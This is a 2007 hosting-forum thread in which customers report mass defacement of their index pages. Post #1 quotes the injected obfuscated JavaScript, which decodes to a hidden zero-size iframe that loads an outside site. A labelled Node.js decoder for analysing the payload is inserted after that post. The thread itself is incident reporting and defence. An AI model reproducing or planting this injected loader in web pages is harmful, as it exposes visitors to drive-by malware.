Welcome to the JaguarPC Community

This is a discussion on Hacker Attack in the Shared & Semi-Dedicated forum

  1. #1
    JPC Member
    Join Date
    Sep 2007
    Location
    Deerfield Beach, Florida
    Posts
    5

    Hacker Attack

    Steps to reproduce the problem:

    I have noticed many of the index.php, index.html, index.htm, and basically all index pages have been modified. Since it happened to all the index pages, I really don't think it was manually done. I checked the permissions on those pages and they were all set at 644.

    At http://directory.isins.com, I noticed a piece of JavaScript was added at the end of the index page. Here it is:

    <<!-- ~ --><script language=javascript>document.write(unesc ape('%3C%73%63%72%69%70%74%20%6C%61%6E%6 7%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E% 20%64%46%28%73%29%7B%76%61%72%20%73%31%3 D%75%6E%65%73%63%61%70%65%28%73%2E%73%75 %62%73%74%72%28%30%2C%73%2E%6C%65%6E%67% 74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C %73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B% 29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6 F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E %63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%6 5%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F %63%75%6D%65%6E%74%2E%77%72%69%74%65%28% 75%6E%65%73%63%61%70%65%28%74%29%29%3B%7 D%3C%2F%73%63%72%69%70%74%3E'));dF('%264 Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F %261E%261Bepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E% 2638iuuq%264B00xxx/gsff31/dpn0qpsubm0joefy/qiq%264Gbgg%264Esb%7Bfdd%2638%2631xjeui% 264E%26381%2638%2631ifjhiu%264E%26381%26 38%2631gsbnfcpsefs%264E%26381%2638%264F% 264D0jgsbnf%264F%2633%263%3A%261E%261B%2 64D0tdsjqu%264F1')</script><!-- ~ -->
    Last edited by wazimm; 09-17-2007 at 05:05 PM. Reason: forgot quotation marks
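
What the injected script does can be read off without running it. The following is an added example, not code from the thread: a Node.js static decoder for the scheme in post #1, where the first `unescape(...)` string defines a loader `dF` and the second string is its argument. `decodeDF`, `analyse`, and the `example.invalid` sample are assumptions made for illustration.

```javascript
// Added example: static decoding only. Nothing is eval'ed or written to a page.

// Mirrors dF() from the stage-1 loader: the last character of the argument is
// a numeric key; the rest is unescape()d, every character code is lowered by
// the key, and the result is unescape()d again.
function decodeDF(arg) {
  const keyChar = arg.slice(-1);
  if (!/^[0-9]$/.test(keyChar)) throw new Error('argument does not end in a key digit');
  const key = Number(keyChar);
  const s1 = unescape(arg.slice(0, -1));
  let t = '';
  for (let i = 0; i < s1.length; i++) {
    t += String.fromCharCode(s1.charCodeAt(i) - key);
  }
  return unescape(t);
}

// Finds every dF('...') call in a page, decodes it, and flags a zero-sized
// iframe. Whitespace inside the argument is dropped first, because forum
// software and mail clients often wrap long strings.
function analyse(html) {
  const findings = [];
  for (const m of html.matchAll(/dF\('([^']*)'\)/g)) {
    const decoded = decodeDF(m[1].replace(/\s+/g, ''));
    const hiddenIframe =
      /<iframe\b[^>]*\b(?:width|height)\s*=\s*['"]?0\b/i.test(decoded);
    findings.push({ decoded, hiddenIframe });
  }
  return findings;
}

// First bytes of the dF(...) argument quoted in post #1, plus its key digit.
const PAGE_EXCERPT = '%264Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F' + '1';

// Constructed sample (not from the thread): same encoding, placeholder host.
const SAMPLE =
  "<p>footer</p><script>dF('%264Djgsbnf%2631tsd%264E%2638iuuq%264B00" +
  "fybnqmf/jowbmje0%2638%2631xjeui%264E1%2631ifjhiu%264E1%264F1')</script>";

console.log(decodeDF(PAGE_EXCERPT));
console.log(analyse(SAMPLE));
```

Running `analyse` over saved copies of the modified index pages gives the decoded markup as plain text, which can then be compared across accounts and servers.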

  2. #2
    Yeah, I know a LOT! Vin DSL
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Have you checked your logs yet?
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  3. #3
    JPC Member
    Join Date
    Sep 2007
    Posts
    2
    Bugger- yep, I got hit too. On yoda if it matters. I doubt they came in through one of my scripts. Looks like most of the index pages were hit. I put in a ticket. Looking at logs will have to wait until morning- hopefully support will have it nailed down by then anyway.

  4. #4
    CTO JPC-Masood
    Join Date
    Aug 2002
    Location
    Jaguar Servers
    Posts
    2,070
    Please make sure your account is secure: http://www.jaguarpc.com/support/kbase/731.html

    Masood N. | Chief Technical Officer
    JaguarPC.com



  5. #5
    JPC Member
    Join Date
    Sep 2007
    Posts
    2
    Thanks for the link- that's pretty much what the ticket reply said as well. However, I didn't have the raw logs saved. I've only got one script running and it is tight and up to date. While it's possible something could have snuck in that way, I seriously doubt it. I did have a current openid script up- though not linked in. Still- didn't see any security reports on it.

    The other option I can think of is guessing my ftp info. But without the raw logs- does that mean there's basically no way to track down how they gained access? If I can't track that down for sure, I can't be sure it's fixed.

  6. #6
    the Windlord Gwaihir
    Join Date
    Jun 2002
    Posts
    2,562
    Can't support get you the raw log? This is a recent event, right?
    Regards,

    Wim Heemskerk
    ---
    Visit MeCCG.net - Cardgaming in J.R.R. Tolkien's Middle-earth
    And Gwaihir.net - The Middle-earth CCG store

  7. #7
    JPC Member
    Join Date
    Jun 2007
    Location
    Athens, Greece
    Posts
    1
    Originally posted by wazimm:
    Steps to reproduce the problem:

    I have noticed many of the index.php, index.html, index.htm, and basically all index pages have been modified. Since it happened to all the index pages, I really don't think it was manually done. I checked the permissions on those pages and they were all set at 644.

    At http://directory.isins.com, I noticed a piece of JavaScript was added at the end of the index page. Here it is:
    The exact same thing happened to me. It probably started yesterday, or the day before that. My main domain is a simple html file, linking to my two subdomains that both run the latest version of Wordpress. The same javascript was on all the index.(php|html|htm) files, on all three of the domains.

    I just re-uploaded everything to make sure it's gone.

  8. #8
    JPC Member
    Join Date
    Apr 2006
    Posts
    48
    Yup, got hacked too.

    Can someone give some info on this? How it was done and how it can be avoided again?

  9. #9
    JPC Member
    Join Date
    Apr 2006
    Posts
    48
    Any more news on this? I checked that all my pages were 644, I don't have any premade scripts on my site. I only have a few pages on my site and it's off the internet. The only way you can get into the site is by logging in, and the usernames and passwords are pretty secure. I'm on a different server than yoda. Looks like more than one server got attacked.

    Also, I didn't realise I got hacked until one of the users pointed it out. The JavaScript didn't work on my browser but it did on others. So other webmasters might want to check their index.htm|html|php pages to see if they got hacked. The code is in the footer of the pages.

  10. #10
    Old Hillbilly Connie
    Join Date
    Sep 2001
    Location
    Hills of Missouri
    Posts
    2,648
    What is that javascript supposed to do?

    Forum Moderators - Jag Staff

    Spam Whackers Blog - Dedicated to fighting Spam and providing General SEO Tips
    Organize your Kitchen or purchase Kitchen Accessories at Condells
    Ihelpyou Forum - Dedicated to "Best Practices" SEO

  11. #11
    JPC Addict lloyd_borrett
    Join Date
    May 2004
    Location
    Melbourne, Australia
    Posts
    132
    I'm constantly getting hacked on a number of my JaguarPC accounts over the last few days. I haven't been able to determine where the hole that is being exploited is. I can't even determine what the common denominator to these accounts is.

  12. #12
    all about nothing! Frank Broughton
    Join Date
    Jan 2006
    Posts
    2,158
    Lloyd,

    Are you in communication with the bigwigs on this?

  13. #13
    Loyal Client
    Join Date
    Nov 2003
    Location
    KY
    Posts
    27
    I have found several of the sites I maintain hacked today. They range from simple HTML sites to open source commerce sites. They span several servers on Jag.

    I reported the info to Jag, and got the same generic response link, but with two of the sites being very basic HTML sites (with 1 PHP include for the menus), I don't see them being caused by a script.

    Now I get to check every other site I maintain.

  14. #14
    Ron
    Loyal Client
    Join Date
    Aug 2002
    Posts
    7,307
    So far everything is ok at my sites.... but I don't like saying this.
    Good luck

  15. #15
    JPC Member
    Join Date
    Sep 2007
    Posts
    17

    hacked again

    9 sites hacked over the last 3 days, 3 of them 3 times ... I have also gotten the canned link from support as well. I am starting to think perhaps it's another hole in cPanel or Jag has some serious problems.
    Last edited by Mighty; 09-19-2007 at 12:28 PM. Reason: typo
